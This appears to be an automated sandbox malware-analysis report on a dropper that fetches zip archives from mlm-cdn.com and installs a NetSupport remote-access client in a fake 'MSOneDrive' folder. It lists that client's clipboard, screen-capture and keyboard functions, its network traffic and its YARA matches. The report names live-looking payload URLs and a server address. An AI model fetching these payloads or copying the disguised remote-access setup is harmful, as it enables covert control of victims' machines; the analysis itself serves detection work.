                                Source: client32.exe, 0000000B.00000003.1671103639.0000000001162000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000B.00000002.3746392967.0000000001162000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/
                                Source: client32.exe, client32.exe, 0000000D.00000002.1391176312.0000000011181000.00000002.00000001.01000000.00000008.sdmp, PCICL32.DLL.3.drString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp
                                Source: client32.exe, 0000000B.00000002.3743777363.00000000010C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspO
                                Source: client32.exe, 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 0000000D.00000002.1391176312.0000000011181000.00000002.00000001.01000000.00000008.sdmp, PCICL32.DLL.3.drString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)
                                Source: client32.exe, 0000000B.00000002.3743777363.0000000001146000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000B.00000003.1671103639.0000000001146000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspT
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368006900.0000000001127000.00000004.00000020.00020000.00000000.sdmp, AudioCapture.dll.3.dr, pcicapi.dll.3.dr, PCICHEK.DLL.3.drString found in binary or memory: http://ocsp.comodoca.com0
                                Source: remcmdstub.exe.3.drString found in binary or memory: http://ocsp.sectigo.com0
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.3.dr, PCICL32.DLL.3.drString found in binary or memory: http://ocsp.thawte.com0
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.3.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g20
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368006900.0000000001127000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.3.dr, client32.exe.3.drString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368006900.0000000001127000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.3.dr, client32.exe.3.drString found in binary or memory: http://s2.symcb.com0
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.3.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g2.crt08
                                Source: client32.exe.3.drString found in binary or memory: http://sv.symcb.com/sv.crl0a
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368006900.0000000001127000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.3.drString found in binary or memory: http://sv.symcb.com/sv.crl0f
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368006900.0000000001127000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.3.dr, client32.exe.3.drString found in binary or memory: http://sv.symcb.com/sv.crt0
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368006900.0000000001127000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.3.dr, client32.exe.3.drString found in binary or memory: http://sv.symcd.com0&
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.3.dr, PCICL32.DLL.3.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.3.dr, PCICL32.DLL.3.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.3.dr, PCICL32.DLL.3.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.3.drString found in binary or memory: http://www.crossteccorp.com
                                Source: client32.exe, 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp, client32.exe, 0000000D.00000002.1391294248.00000000111CD000.00000004.00000001.01000000.00000008.sdmp, PCICL32.DLL.3.drString found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp
                                Source: client32.exe, 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp, client32.exe, 0000000D.00000002.1391294248.00000000111CD000.00000004.00000001.01000000.00000008.sdmp, PCICL32.DLL.3.drString found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp118
                                Source: PCICL32.DLL.3.drString found in binary or memory: http://www.netsupportsoftware.com
                                Source: client32.exe, 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp, client32.exe, 0000000D.00000002.1391294248.00000000111CD000.00000004.00000001.01000000.00000008.sdmp, PCICL32.DLL.3.drString found in binary or memory: http://www.pci.co.uk/support
                                Source: client32.exe, 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp, client32.exe, 0000000D.00000002.1391294248.00000000111CD000.00000004.00000001.01000000.00000008.sdmp, PCICL32.DLL.3.drString found in binary or memory: http://www.pci.co.uk/supportsupport
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368006900.0000000001127000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.3.dr, client32.exe.3.drString found in binary or memory: http://www.symauth.com/cps0(
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368006900.0000000001127000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.3.dr, client32.exe.3.drString found in binary or memory: http://www.symauth.com/rpa00
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368006900.0000000001127000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.3.dr, client32.exe.3.drString found in binary or memory: https://d.symcb.com/cps0%
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368006900.0000000001127000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.3.dr, client32.exe.3.drString found in binary or memory: https://d.symcb.com/rpa0
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mlm-cdn.com/
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368040624.00000000010FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mlm-cdn.com/1
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368040624.00000000010FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mlm-cdn.com/k
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.000000000105E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mlm-cdn.com/ssd/sdn1.zip
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1318840314.00000000010FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mlm-cdn.com/ssd/sdn1.zipl
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.000000000105E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mlm-cdn.com/ssd/sdn2.zip
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368040624.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mlm-cdn.com/ssd/sdn2.zip2a
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.000000000105E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mlm-cdn.com/ssd/sdn3.zip
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368040624.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.000000000105E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mlm-cdn.com/ssd/sdn4.zip
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.000000000105E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mlm-cdn.com/ssd/sdn4.zip2%localappdata%/MSOneDrive
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368040624.00000000010FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mlm-cdn.com/ssd/sdn4.zipJ
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368040624.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mlm-cdn.com/ssd/sdn4.zipL
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368040624.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mlm-cdn.com/ssd/sdn4.zipj
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368040624.00000000010FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mlm-cdn.com/ssd/sdn4.zipom/ssd/sdn3.zipe4$
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368006900.0000000001127000.00000004.00000020.00020000.00000000.sdmp, AudioCapture.dll.3.dr, PCICHEK.DLL.3.drString found in binary or memory: https://sectigo.com/CPS0
                                Source: remcmdstub.exe.3.drString found in binary or memory: https://sectigo.com/CPS0B
                                Source: pcicapi.dll.3.dr, remcmdstub.exe.3.drString found in binary or memory: https://sectigo.com/CPS0C
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368006900.0000000001127000.00000004.00000020.00020000.00000000.sdmp, AudioCapture.dll.3.dr, pcicapi.dll.3.dr, PCICHEK.DLL.3.dr, remcmdstub.exe.3.drString found in binary or memory: https://sectigo.com/CPS0D
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.3.drString found in binary or memory: https://www.globalsign.com/repository/0
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.3.drString found in binary or memory: https://www.globalsign.com/repository/06
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63021
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63020
                                Source: unknownNetwork traffic detected: HTTP traffic on port 63017 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 63016 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 63018 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 63019 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63019
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63016
                                Source: unknownNetwork traffic detected: HTTP traffic on port 63021 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63018
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63017
                                Source: unknownNetwork traffic detected: HTTP traffic on port 63020 -> 443
                                Source: unknownHTTPS traffic detected: 142.11.212.184:443 -> 192.168.2.7:49700 version: TLS 1.2
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_1101DBE0 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,11_2_1101DBE0
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_11031300 GetClipboardFormatNameA,SetClipboardData,11_2_11031300
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_1101DBE0 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,11_2_1101DBE0
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 13_2_11031300 GetClipboardFormatNameA,SetClipboardData,13_2_11031300
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 13_2_1101DBE0 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,13_2_1101DBE0
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_11031080 IsClipboardFormatAvailable,GetClipboardData,GetClipboardFormatNameA,GetLastError,GlobalUnlock,11_2_11031080
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_11117290 _calloc,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,_malloc,_calloc,Sleep,GetTickCount,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetTickCount,WaitForSingleObject,_memset,_memset,_malloc,_malloc,_memset,_calloc,_calloc,GetSystemPaletteEntries,GetStockObject,SelectPalette,SelectPalette,SelectPalette,RealizePalette,_memset,SelectPalette,DeleteObject,CreatePalette,SelectPalette,RealizePalette,BitBlt,GetObjectA,GetBitmapBits,GetDIBits,_malloc,_free,GetTickCount,GetTickCount,WaitForSingleObject,GetTickCount,WaitForSingleObject,GetTickCount,CloseHandle,_free,_free,_free,_free,SelectObject,DeleteObject,DeleteObject,SelectPalette,DeleteObject,DeleteDC,ReleaseDC,_free,_free,_free,11_2_11117290
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_11106C70 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState,11_2_11106C70
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 13_2_11106C70 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState,13_2_11106C70
                                Source: Yara matchFile source: 13.2.client32.exe.111a3f08.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 11.2.client32.exe.111a3f08.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 13.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 11.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0000000D.00000002.1391176312.0000000011181000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: client32.exe PID: 7384, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: client32.exe PID: 7512, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\MSOneDrive\PCICL32.DLL, type: DROPPED

                                Spam, unwanted Advertisements and Ransom Demands

                                barindex
                                Contains functionalty to change the wallpaper
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_11108CB0 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,11_2_11108CB0
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 13_2_11108CB0 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,13_2_11108CB0
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_111058F0: GetKeyState,DeviceIoControl,keybd_event,11_2_111058F0
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_11085430 _memset,GetVersionExA,OpenWindowStationA,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopA,SetProcessWindowStation,CloseWindowStation,SetHandleInformation,SetHandleInformation,SetHandleInformation,_memset,LoadLibraryA,GetProcAddress,IsBadReadPtr,CreateProcessAsUserA,GetProcAddress,FreeLibrary,MsgWaitForMultipleObjects,MsgWaitForMultipleObjects,PeekMessageA,DispatchMessageA,PeekMessageA,DispatchMessageA,PeekMessageA,MsgWaitForMultipleObjects,CloseHandle,CloseHandle,CloseHandle,GetProcessHeap,HeapFree,GetLastError,CloseDesktop,GetLastError,SetProcessWindowStation,CloseWindowStation,GetLastError,11_2_11085430
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_1102BB50 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,11_2_1102BB50
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 13_2_1102BB50 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,13_2_1102BB50
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeCode function: 3_2_00C810003_2_00C81000
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeCode function: 3_2_00C814203_2_00C81420
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeCode function: 3_2_00C869E03_2_00C869E0
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeCode function: 3_2_00C81A803_2_00C81A80
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeCode function: 3_2_00C978673_2_00C97867
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeCode function: 3_2_00C83C203_2_00C83C20
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeCode function: 3_2_00C845803_2_00C84580
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeCode function: 3_2_00C85D403_2_00C85D40
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeCode function: 3_2_00C861203_2_00C86120
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeCode function: 3_2_00C8BAFC3_2_00C8BAFC
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeCode function: 3_2_00C927EB3_2_00C927EB
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeCode function: 3_2_00C82FB03_2_00C82FB0
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeCode function: 3_2_00C84B403_2_00C84B40
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeCode function: 3_2_00C923403_2_00C92340
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_1105D55011_2_1105D550
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_1106DED011_2_1106DED0
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_110280F011_2_110280F0
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_1110E3D011_2_1110E3D0
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_110A934011_2_110A9340
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_1111729011_2_11117290
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_1101B5A011_2_1101B5A0
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_1114D43011_2_1114D430
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_1103143011_2_11031430
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_1104345011_2_11043450
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_11151CA011_2_11151CA0
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_11029FB011_2_11029FB0
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_11155E6511_2_11155E65
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_110AC1B011_2_110AC1B0
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_1101A34011_2_1101A340
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_1108253011_2_11082530
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_1101A78011_2_1101A780
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_1100892011_2_11008920
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_1115C9AB11_2_1115C9AB
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_1104CBF011_2_1104CBF0
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_1107ADC011_2_1107ADC0
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_1106AC4011_2_1106AC40
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_110A8E3011_2_110A8E30
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_6C8090A011_2_6C8090A0
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_6C837DD611_2_6C837DD6
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_6C831EC611_2_6C831EC6
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_6C816AB011_2_6C816AB0
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 13_2_1105D55013_2_1105D550
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 13_2_1111729013_2_11117290
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 13_2_1101B5A013_2_1101B5A0
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 13_2_1114D43013_2_1114D430
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 13_2_1103143013_2_11031430
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 13_2_1104345013_2_11043450
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 13_2_11151CA013_2_11151CA0
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 13_2_11029FB013_2_11029FB0
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 13_2_11155E6513_2_11155E65
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 13_2_1106DED013_2_1106DED0
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 13_2_110280F013_2_110280F0
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 13_2_1101A34013_2_1101A340
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 13_2_1108253013_2_11082530
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 13_2_1101A78013_2_1101A780
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 13_2_1100892013_2_11008920
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 13_2_1115C9AB13_2_1115C9AB
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 13_2_1104CBF013_2_1104CBF0
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 13_2_1107ADC013_2_1107ADC0
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 13_2_1106AC4013_2_1106AC40
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeProcess token adjusted: SecurityJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeCode function: String function: 00C87AE0 appears 33 times
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: String function: 1107C4F0 appears 84 times
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: String function: 111524F0 appears 66 times
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: String function: 111356E0 appears 1159 times
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: String function: 11135EC0 appears 44 times
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: String function: 11027FB0 appears 2033 times
